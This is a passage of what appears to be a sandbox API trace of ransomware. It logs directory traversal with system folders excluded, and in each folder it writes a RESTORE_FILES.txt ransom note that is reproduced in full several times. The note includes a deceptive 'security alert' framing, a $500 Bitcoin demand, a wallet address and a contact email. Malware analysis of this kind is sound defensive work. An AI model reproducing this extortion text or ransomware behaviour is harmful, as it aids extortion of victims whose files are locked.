lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.422] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.422] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.422] CloseHandle (hObject=0x154) returned 1 [0087.422] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned 109 [0087.422] lstrcmpW (lpString1="grm", lpString2=".") returned 1 [0087.422] lstrcmpW (lpString1="grm", lpString2="..") returned 1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*") returned 111 [0087.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.422] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\.") returned 111 [0087.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.422] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\..") returned 112 [0087.422] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.422] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.423] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.423] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\RESTORE_FILES.txt") returned 127 [0087.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\grm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.423] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.423] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.424] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.424] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.424] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.424] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.424] CloseHandle (hObject=0x154) returned 1 [0087.424] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Windows") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Program Files") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="Program Files (x86)") returned -1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="$Recycle.bin") returned 1 [0087.424] lstrcmpiW (lpString1="itl", lpString2="System Volume Information") returned -1 [0087.424] 
wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned 109 [0087.424] lstrcmpW (lpString1="itl", lpString2=".") returned 1 [0087.424] lstrcmpW (lpString1="itl", lpString2="..") returned 1 [0087.424] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*") returned 111 [0087.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.425] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.425] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.425] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\.") returned 111 [0087.425] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.425] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.425] lstrcmpiW (lpString1="..", lpString2="System Volume 
Information") returned -1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\..") returned 112 [0087.425] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.425] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.425] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.425] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\RESTORE_FILES.txt") returned 127 [0087.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\itl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.426] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.426] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.426] lstrlenA (lpString="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") returned 684 [0087.426] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.427] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.427] CloseHandle (hObject=0x154) returned 1 [0087.427] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Windows") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Program Files") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="Program Files (x86)") returned -1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="$Recycle.bin") returned 1 [0087.427] lstrcmpiW (lpString1="nrw", lpString2="System Volume Information") returned -1 [0087.427] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned 109 [0087.427] lstrcmpW (lpString1="nrw", lpString2=".") returned 1 [0087.427] lstrcmpW (lpString1="nrw", lpString2="..") returned 1 [0087.427] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*") returned 111 [0087.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.427] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.427] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\.") returned 111 [0087.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.427] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.428] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\..") returned 112 [0087.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.428] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.428] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.428] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\RESTORE_FILES.txt") returned 127 [0087.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\nrw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.429] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.429] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.430] lstrlenA (lpString="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") returned 684 [0087.430] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, 
lpOverlapped=0x0) returned 1 [0087.430] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.430] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.430] CloseHandle (hObject=0x154) returned 1 [0087.430] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Windows") returned -1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Program Files") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="Program Files (x86)") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="$Recycle.bin") returned 1 [0087.430] lstrcmpiW (lpString1="prt", lpString2="System Volume Information") returned -1 [0087.430] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned 109 [0087.430] lstrcmpW (lpString1="prt", lpString2=".") returned 1 [0087.430] lstrcmpW (lpString1="prt", lpString2="..") returned 1 [0087.430] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*") returned 111 [0087.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.431] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.431] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0087.431] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.431] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.431] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\.") returned 111 [0087.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.431] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\..") returned 112 [0087.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.431] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.431] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.431] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\RESTORE_FILES.txt") returned 127 [0087.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\prt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.432] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.433] lstrlenA (lpString="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") returned 684 [0087.433] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.433] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.433] CloseHandle (hObject=0x154) returned 1 [0087.433] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Windows") returned -1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Program Files") returned 1 [0087.433] lstrcmpiW (lpString1="spn", lpString2="Program Files (x86)") returned 1 [0087.434] lstrcmpiW (lpString1="spn", 